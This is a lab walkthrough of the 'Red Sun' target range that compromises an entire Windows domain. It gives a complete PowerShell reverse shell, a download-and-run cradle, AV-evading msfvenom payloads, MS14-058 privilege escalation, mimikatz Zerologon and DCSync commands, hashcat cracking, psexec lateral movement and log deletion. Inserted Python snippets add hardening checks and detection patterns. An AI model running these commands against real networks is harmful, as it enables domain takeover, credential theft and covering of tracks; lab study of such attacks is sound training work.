Red Sun (紅日) Target Machine 2
Environment setup
All that is needed is to switch the VM's host-only adapter to the 10.10.10.0 subnet, configured as follows
Switch the NAT adapter to the 192.168.96.0 subnet, as follows
First revert to the v1.3 snapshot
Then click Discard; after discarding, power on again and log in with the other user's credentials .\de1ay:1qaz@WSX. The password has expired; change it and the login succeeds
After that, start the WebLogic service on the WEB server from
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
running it as administrator
Setup is complete; now log in to kali
I. nmap scan
1) Host discovery
sudo nmap -sn -o hosts 192.168.111.0/24
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.111.80
Host is up (0.00013s latency).
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap scan report for 192.168.111.201
192.168.111.201 and 192.168.111.80 are the newly added IPs
2) Port discovery
192.168.111.80
sudo nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:09 CST
Nmap scan report for 192.168.111.80
Host is up (0.00040s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
7001/tcp open afs3-callback
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49175/tcp open unknown
49261/tcp open unknown
60966/tcp open unknown
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.04 seconds
192.168.111.201
sudo nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 201_ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:04 CST
Nmap scan report for 192.168.111.201
Host is up (0.00045s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49178/tcp open unknown
MAC Address: 00:0C:29:84:B4:3E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
The 192.168.111.80 host has ports 80 and 7001 open, which is obviously of interest: the web attack surface is broad, and 7001 is WebLogic's default port. We run a detailed scan against 192.168.111.80
3) Detailed scan
First we narrow the scan to the open ports, which makes it faster and more accurate
Copy the open ports into the ports variable
ports=$(cat 80_ports | grep open | awk -F/ '{print $1}' | paste -sd ,)
After typing $ports, press Tab and it expands
sudo nmap -sT -sV -sC -O -p$ports 192.168.111.80 -o details
# Nmap 7.93 scan initiated Tue Sep 24 16:18:25 2024 as: nmap -sT -sV -sC -O -p80,135,139,445,1433,3389,7001,49152,49153,49154,49175,49261,60966 -o details 192.168.111.80
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| 192.168.111.80:1433:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ms-sql-info:
| 192.168.111.80:1433:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 1433
3389/tcp open ms-wbt-server?
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2024-09-23T07:46:09
|_Not valid after: 2025-03-25T07:46:09
| rdp-ntlm-info:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
| Product_Version: 6.1.7601
|_ System_Time: 2024-09-24T08:19:51+00:00
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
49261/tcp open msrpc Microsoft Windows RPC
60966/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
| 192.168.111.80:60966:
| Target_Name: DE1AY
| NetBIOS_Domain_Name: DE1AY
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: de1ay.com
| DNS_Computer_Name: WEB.de1ay.com
| DNS_Tree_Name: de1ay.com
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after: 2054-09-24T07:53:06
| ms-sql-info:
| 192.168.111.80:60966:
| Version:
| name: Microsoft SQL Server 2008 R2 SP2
| number: 10.50.4000.00
| Product: Microsoft SQL Server 2008 R2
| Service pack level: SP2
| Post-SP patches applied: false
|_ TCP port: 60966
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=9/24%Time=66F275DE%P=x86_64-pc-linux-gnu%r(Te
SF:rminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\x01\x08\0\x0
SF:2\0\0\0");
MAC Address: 00:0C:29:BE:34:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: WEB
| NetBIOS computer name: WEB\x00
| Domain name: de1ay.com
| Forest name: de1ay.com
| FQDN: WEB.de1ay.com
|_ System time: 2024-09-24T16:19:55+08:00
|_clock-skew: mean: -53m19s, deviation: 2h39m58s, median: 0s
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-09-24T08:19:54
|_ start_date: 2024-09-24T07:53:08
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 24 16:20:30 2024 -- 1 IP address (1 host up) scanned in 124.83 seconds
So port 7001 is indeed the WebLogic service
II. Web penetration
Open the port 80 page
It is blank, so we have to give up on 80.
Open port 7001
There is content here, so we visit WebLogic's default login page
http://192.168.111.80:7001/console/login/LoginForm.jsp
The bottom-left corner reveals the WebLogic version: 10.3.6.0
Enumerate it with weblogicScanner
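As an added example (not part of the original writeup), a small Python parser for nmap's -oN output like the details file above: it builds the same open-port list as the grep/awk/paste pipeline and also flags the hardening gaps the scan already exposes (TRACE, SMB signing, T3, end-of-life OS). The SAMPLE excerpt is constructed from the scan output above; the remediation notes in CHECKS are my own.

```python
import re

# Constructed excerpt modelled on the "details" scan output above.
SAMPLE = """\
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds  Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
7001/tcp  open  http          Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
Host script results:
| smb2-security-mode:
|   210:
|_    Message signing enabled but not required
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# One port-table row: "80/tcp  open  http  Microsoft IIS httpd 7.5"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# (substring reported by nmap, hardening note) pairs
CHECKS = [
    ("Potentially risky methods: TRACE", "HTTP TRACE enabled: disable it (cross-site tracing)"),
    ("T3 protocol in use", "WebLogic T3 exposed: filter T3/T3S with a connection filter"),
    ("Message signing enabled but not required", "SMB2 signing optional: require it via GPO"),
    ("message_signing: disabled", "SMB1 signing disabled: require signing / retire SMB1"),
    ("Windows Server 2008 R2", "End-of-life OS (Windows Server 2008 R2)"),
]


def parse_ports(text):
    """Return [(port, state, service, version)] for each port-table row."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(3), m.group(4), m.group(5).strip()))
    return rows


def open_port_list(text):
    """Comma-separated open ports, the value the grep/awk/paste pipeline builds."""
    return ",".join(str(p) for p, state, _, _ in parse_ports(text) if state == "open")


def findings(text):
    """Attach each matched check to the port it sits under ('host' for host scripts)."""
    out, current = [], "host"
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = m.group(1)          # script lines that follow belong to this port
        elif line.startswith("Host script results"):
            current = "host"
        for needle, note in CHECKS:
            if needle in line:
                out.append((current, note))
    return out


if __name__ == "__main__":
    print("open ports:", open_port_list(SAMPLE))
    for port, note in findings(SAMPLE):
        print(f"[{port}] {note}")
```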
git clone https://github.com/0xn0ne/weblogicScanner.git
cd weblogicScanner
python ws.py -t 192.168.111.80:7001
[20:35:09][INFO] [!][CVE-2019-2890][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [!][CVE-2017-3248][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [-][CVE-2017-3248][192.168.111.80:7001] Not vulnerability.
[20:35:09][INFO] [-][CVE-2019-2890][192.168.111.80:7001] Not vulnerability.
[20:35:10][INFO] [+][CVE-2019-2618][192.168.111.80:7001] Found module, Please verify manually!
[20:35:10][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!
[20:35:11][INFO] [!][CVE-2018-2893][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [!][CVE-2018-2628][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [-][CVE-2018-2628][192.168.111.80:7001] Not vulnerability.
[20:35:11][INFO] [-][CVE-2018-2893][192.168.111.80:7001] Not vulnerability.
[20:35:12][INFO] [!][CVE-2020-14882][192.168.111.80:7001] Connection error.
[20:35:12][INFO] [-][CVE-2020-14882][192.168.111.80:7001] Not vulnerability.
[20:35:13][INFO] [-][CVE-2017-10271][192.168.111.80:7001] Not vulnerability.
[20:35:14][INFO] [+][CVE-2019-2888][192.168.111.80:7001] Found module, Please verify manually!
[20:35:15][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!
[20:35:19][INFO] [-][CVE-2020-2883][192.168.111.80:7001] Not vulnerability.
[20:35:19][INFO] [-][CVE-2018-3191][192.168.111.80:7001] Not vulnerability.
[20:35:20][INFO] [-][CVE-2020-2555][192.168.111.80:7001] Not vulnerability.
[20:35:21][INFO] [!][CVE-2020-2551][192.168.111.80:7001] Connection error.
[20:35:21][INFO] [-][CVE-2020-2551][192.168.111.80:7001] Not found.
[20:35:23][INFO] [+][CVE-2014-4210][192.168.111.80:7001] Found module, Please verify manually!
[20:35:24][INFO] [+][CVE-2016-3510][192.168.111.80:7001] Exists vulnerability!
[20:35:24][INFO] [-][CVE-2016-0638][192.168.111.80:7001] Not vulnerability.
[20:35:24][INFO] [+][CVE-2020-14750][192.168.111.80:7001] Exists vulnerability!
[20:35:25][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!
[20:35:27][INFO] [-][CVE-2019-2729][192.168.111.80:7001] Not vulnerability.
[20:35:30][INFO] [-][Weblogic Console][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2018-2894][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2020-14883][192.168.111.80:7001] Not vulnerability.
[20:35:32][INFO] [-][CVE-2018-3252][192.168.111.80:7001] Not found.
Run completed, 30 seconds total.
Filter the results
cat result.txt| grep + | sed -e 's/\[//g' | sed 's/\]/ /g'|awk '{print $4" " $6" " $7}'
CVE-2019-2618 Found module,
CVE-2017-3506 Exists vulnerability!
CVE-2019-2888 Found module,
CVE-2019-2725 Exists vulnerability!
CVE-2014-4210 Found module,
CVE-2016-3510 Exists vulnerability!
CVE-2020-14750 Exists vulnerability!
CVE-2018-3245 Exists vulnerability!
That's 8 findings that may exist or are already confirmed; there is no shortcut, we have to try them one by one.
python CVE-2019-2618.py url username password
CVE-2019-2618.py needs credentials, and vulnerabilities with such preconditions naturally go to the back of the queue
Trying CVE-2017-3506 works
GitHub address: https://github.com/Al1ex/CVE-2017-3506
Open the link
The username web\de1ay is shown
III. Getting a foothold
Reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.10', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
URL-encoded form
powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient('192.168.111.10'%2C%204444)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%20%3D%20%24sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22
Successfully connected back to kali
Run
tasklist /svc
A 360 process is listed, so 360 antivirus is probably installed
IV. AV evasion
1) Getting a CS beacon
Generate an AV-evading CS payload
The payload that checks in to CS needs AV evasion; we use the BypassAV plugin
BypassAV: https://github.com/hack2fun/BypassAV
Because this is a lab in a virtual environment, some functions of the 360 AV are defective, so the basic evasion done with the CS plugin is enough to get through. This is for study reference only
git clone https://github.com/hack2fun/BypassAV.git
Import its bypass.cna file in CS
Import succeeded
Generate the evading program with BypassAV
Select the CS listener
Start a Python web server on kali
python -m http.server
Run in the reverse shell we obtained
powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.10:8000/shell.exe','c:\programdata\shell.exe')
Brief explanation: iex (Invoke-Expression) runs the command string; WebClient sends an HTTP request and downloads shell.exe into the machine's ProgramData directory
The request succeeds, but our shell dies; we kill the shell and get a new reverse shell
The uploaded payload is there
Run
.\shell.exe
Successfully checked in to CS
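From the defender's side, an added example (not from the original writeup) of how the two PowerShell commands above look to a detection pipeline: given process command lines as a Sysmon Event 1 or Security 4688 collector would export them, it URL-decodes them (the reverse shell above was passed URL-encoded) and scores download-cradle and reverse-shell indicators. The SAMPLES are constructed, the first being a shortened non-working sketch of the reverse shell; 192.0.2.10 is a placeholder address and the indicator names are my own labels.

```python
import re
from urllib.parse import quote, unquote

# Indicator regexes; the patterns follow the two commands seen in the writeup.
INDICATORS = {
    "tcp_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "invoke_expression": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "web_download": re.compile(r"Net\.WebClient\)?\.Download(File|String)", re.I),
    "no_profile": re.compile(r"(^|\s)-nop\b", re.I),
    "stream_exec_loop": re.compile(r"GetStream\(\).*\.Read\(", re.I | re.S),
}

# Constructed command lines: a URL-encoded sketch of the reverse shell,
# the download cradle, and two benign ones.
SAMPLES = [
    quote("powershell -nop -c \"$c = New-Object System.Net.Sockets.TCPClient('192.0.2.10',4444);"
          "$s = $c.GetStream();while(($i = $s.Read($b,0,$b.Length)) -ne 0){iex $d}\""),
    "powershell iex(new-object system.net.webclient).downloadfile("
    "'http://192.0.2.10:8000/x.exe','c:\\programdata\\x.exe')",
    "powershell -Command Get-Service -Name Spooler",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]


def normalise(cmdline):
    """Undo URL encoding; go a second round in case of double encoding."""
    decoded = unquote(cmdline)
    return unquote(decoded) if "%" in decoded else decoded


def score(cmdline):
    """Return (score, [indicator names]) for one command line; 0 unless PowerShell."""
    text = normalise(cmdline)
    if not re.search(r"\bpowershell(\.exe)?\b", text, re.I):
        return 0, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return len(hits), hits


def triage(cmdlines, threshold=2):
    """Keep command lines whose indicator count reaches the threshold."""
    flagged = []
    for line in cmdlines:
        n, hits = score(line)
        if n >= threshold:
            flagged.append((normalise(line)[:48], hits))
    return flagged


if __name__ == "__main__":
    for head, hits in triage(SAMPLES):
        print(f"{head!r:52} {hits}")
```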
2) Getting an msf session
a) Direct hand-off (failed)
Migrate the CS session to msf
In msf
use exploit/multi/handler
msf6 exploit(multi/handler) > set Lhost 192.168.111.10
Lhost => 192.168.111.10
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
In CS
Add a foreign listener
Right-click and choose spawn
Select the foreign listener just created
It failed, presumably blocked by 360
b) msf obfuscation (succeeded)
Look at the encoders
msfvenom -l encoder | grep x64
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
Generate an msf payload, apply evasion and get it to check in
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.10 LPORT=4444 -e x64/xor_dynamic -f exe -o payload.exe
Simple obfuscation with msfvenom's options; this is a lab, only an abstraction of a real environment, and nobody expects you to spend a long time on real AV evasion
Upload
Here the reverse shell port conflicted with the msf payload's listening port, so I switched the nc listener port
Run
meterpreter obtained
V. Privilege escalation
1) Escalation in CS
In CS it is simple: the privilege escalation module of the TaoWu (檮杌) plugin does the job.
Click through them one by one; at MS14-058 escalation succeeds
2) msf privilege escalation
msf privilege escalation is more tedious
View the privesc modules in msf
search platform:windows type:exploit local
There are many privesc exploits, and choosing among them comes down to experience
Below I list common privesc vulnerabilities; success or not, each is worth a try, and I mark the outcome
a) getsystem (failed)
With a meterpreter, getsystem is of course the first thing to try
No escalation
b) ms16_032 (failed)
secondary_logon_handle_privesc: exploits a flaw in the Windows Secondary Logon service.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > use windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 6
session => 6
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[+] Compressed size: 1160
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[+] Deleted
[*] Exploit completed, but no session was created.
c) ms14_058 (succeeded)
ms14_058_track_popup_menu: exploits CVE-2014-6324 in Windows. The flaw lets an attacker holding a session as the lowest-privileged user escalate to administrator level.
I reconnected here, so the session id changed
use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) >set session 2
session => 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.111.10:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 4672 launched.
[*] Reflectively injecting the DLL into 4672...
[*] Sending stage (201798 bytes) to 192.168.111.80
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (192.168.111.10:4444 -> 192.168.111.80:63084) at 2024-09-26 15:09:59 +0800
meterpreter >
Escalation succeeded
d) bypassuac (failed)
There are many other methods; try them yourself if interested
VI. Lateral movement
1) Domain controller discovery
Run mimikatz
Credentials seen: de1ay:hongrisec@2024 and mssql:1qaz@WSX
Use portscan to discover hosts
Two live hosts: 10.10.10.10 and 10.10.10.201
It also found some of their open ports
10.10.10.201:3389
[+] received output:
10.10.10.201:139
10.10.10.201:135
10.10.10.10:5985
[+] received output:
10.10.10.10:3389
[+] received output:
10.10.10.10:636
10.10.10.10:593
[+] received output:
10.10.10.10:464
[+] received output:
10.10.10.10:389
[+] received output:
10.10.10.10:139
10.10.10.10:135
[+] received output:
10.10.10.10:88
[+] received output:
10.10.10.10:53
[+] received output:
10.10.10.10:445
10.10.10.201:445
In the CS beacon you can use ping -a to look up a host's name
shell ping -a -n 1 10.10.10.10
shell ping -a -n 1 10.10.10.201
10.10.10.10 resolves to DC, so it is most likely the domain controller, while 10.10.10.201 timed out and we cannot confirm its role yet
2) Vulnerability detection
Check whether the domain controller has the Zerologon vulnerability
A brief introduction to Zerologon:
CVE-2020-1472. When connecting to the domain controller over the Netlogon secure channel, a flaw in the encryption part of the authentication protocol lets an attacker set the domain controller's administrator account password to empty, then obtain password hashes, and ultimately take full control of the domain controller.
Netlogon is an important Windows component: it authenticates users and machines on the domain network, replicates the database for domain controller backup, and maintains the relationships between domain members and the domain, between the domain and the domain controller, and between domain controllers across domains
Run in the CS beacon
mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$
beacon> mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.de1ay.com
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.de1ay.com
Account: DC$
Type : 6 (Server)
Mode : detect
Trying to 'authenticate'...
================================================================
NetrServerAuthenticate2: 0x00000000
* Authentication: OK -- vulnerable
The Zerologon vulnerability is present
3) Exploitation
mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote : DC.de1ay.com
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : DC.de1ay.com
Account: DC$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
==============================================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
Set password : OK
Launch a DCSync attack to obtain the domain controller's user hash
mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC.de1ay.com /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm
[+] host called home, sent: 750705 bytes
[+] received output:
[DC] 'de1ay.com' will be the domain
[DC] 'DC.de1ay.com' will be the DC server
[DC] 'administrator' will be the user account
[AUTH] Username: DC$
[AUTH] Domain : de1ay
[AUTH] Password:
[AUTH] Explicit NTLM Mode
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2019/9/9 10:40:33
Object Security ID : S-1-5-21-2756371121-2868759905-3853650604-500
Object Relative ID : 500
Credentials:
Hash NTLM: 161cff084477fe596a5db81874498a24
Hash NTLM: 161cff084477fe596a5db81874498a24
This is the administrator's hash
Take it to kali and crack it
hashcat creds /usr/share/wordlists/rockyou.txt -m 1000
Credentials recovered:
administrator:1qaz@WSX
Add it to CS
Open Credentials and click Add
Added
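An added example, not from the original writeup, of what the Zerologon reset and the DCSync above leave in the domain controller's Security log and how to correlate them: Event 4742 (computer account changed, here DC$ reset by ANONYMOUS LOGON) followed by Event 4662 carrying the directory-replication control-access GUIDs. EVENTS is a constructed list of dicts using Security-log field names (Properties modelled as a list of GUIDs), and DC_ACCOUNTS is the lab's known DC machine account; the caveat it encodes is that a plain "4662 with replication GUID" rule excludes DC accounts and so would miss a DCSync run as DC$.

```python
from datetime import datetime, timedelta

# Control-access right GUIDs that DCSync needs (AD schema constants).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
DC_ACCOUNTS = {"DC$"}  # machine accounts of known domain controllers (lab value)

# Constructed events; field names follow the Windows Security log.
EVENTS = [
    {"EventID": 4662, "Time": "2024-09-26 09:00:00", "SubjectUserName": "DC$",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},            # routine replication
    {"EventID": 4742, "Time": "2024-09-26 10:05:12", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC$", "PasswordLastSet": "2024-09-26 10:05:12"},  # Zerologon reset
    {"EventID": 4662, "Time": "2024-09-26 10:06:40", "SubjectUserName": "DC$",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},            # DCSync as DC$
    {"EventID": 4662, "Time": "2024-09-26 10:30:00", "SubjectUserName": "DC$",
     "Properties": ["00000000-0000-0000-0000-000000000000"]},            # placeholder, unrelated
    {"EventID": 4662, "Time": "2024-09-26 11:00:00", "SubjectUserName": "jdoe",
     "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},            # DCSync as a user
    {"EventID": 4742, "Time": "2024-09-26 12:00:00", "SubjectUserName": "WEB$",
     "TargetUserName": "WEB$", "PasswordLastSet": "2024-09-26 12:00:00"},  # normal rotation
]


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def zerologon_resets(events):
    """4742 where a machine account password was set by ANONYMOUS LOGON."""
    return [e for e in events if e["EventID"] == 4742
            and e["TargetUserName"].endswith("$")
            and e["SubjectUserName"].upper() == "ANONYMOUS LOGON"
            and e.get("PasswordLastSet", "-") != "-"]


def dcsync_reads(events, window=timedelta(hours=1)):
    """4662 with a replication GUID. DCs replicate with these rights all day,
    so DC accounts are normally excluded; the exception is a DC account whose
    password was just reset by ANONYMOUS LOGON, which is the Zerologon case."""
    resets = [(e["TargetUserName"], ts(e["Time"])) for e in zerologon_resets(events)]
    hits = []
    for e in events:
        if e["EventID"] != 4662 or not REPL_GUIDS.intersection(e["Properties"]):
            continue
        subj = e["SubjectUserName"]
        after_reset = any(acct == subj and timedelta(0) <= ts(e["Time"]) - t <= window
                          for acct, t in resets)
        if after_reset:
            hits.append((e["Time"], subj, "dc-account-after-anonymous-reset"))
        elif subj not in DC_ACCOUNTS:
            hits.append((e["Time"], subj, "non-dc-account"))
    return hits
```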
4) Lateral movement
a) Domain controller
Add a listener on 192.168.111.80 and name it DC
Go to Targets and select the domain controller
Select the credential and listener just added
The domain controller checks in
It is SYSTEM on the domain controller
b) Other machines
With domain controller privileges, the remaining host is just a psexec hop
Choose the domain controller's session
SYSTEM on 10.10.10.201 has checked in
VII. Persistence
I summarized these operations in an earlier article; see
《Windows Persistence Summary》
CS plugins can do this as well
VIII. Covering tracks
Mainly, delete the logs generated during the attack and the files we uploaded to make the penetration go smoothly
The CS plugins can delete the system logs
Summary
- The nmap scan found the two target addresses and each was port-scanned; 192.168.111.80 had ports 80 and 7001 open and the other host did not. Naturally the 80 host went to the front of the queue.
- Visiting ports 80 and 7001 showed that 7001 was the default WebLogic service; the weblogicScanner enumeration tool reported many possible version-specific vulnerabilities, and after trial and error we obtained a shell on the web host
- With the web host compromised, 360 antivirus was found among its processes; after simple evasion of the CS (msf) payload file, it checked in to CS (msf)
- Using the frameworks' privilege escalation modules, we escalated to SYSTEM
- Running mimikatz's zerologon module showed the domain controller was vulnerable; exploiting Zerologon we moved laterally to the domain controller and obtained SYSTEM on it. With the domain controller's credentials we also obtained SYSTEM on the other host in the domain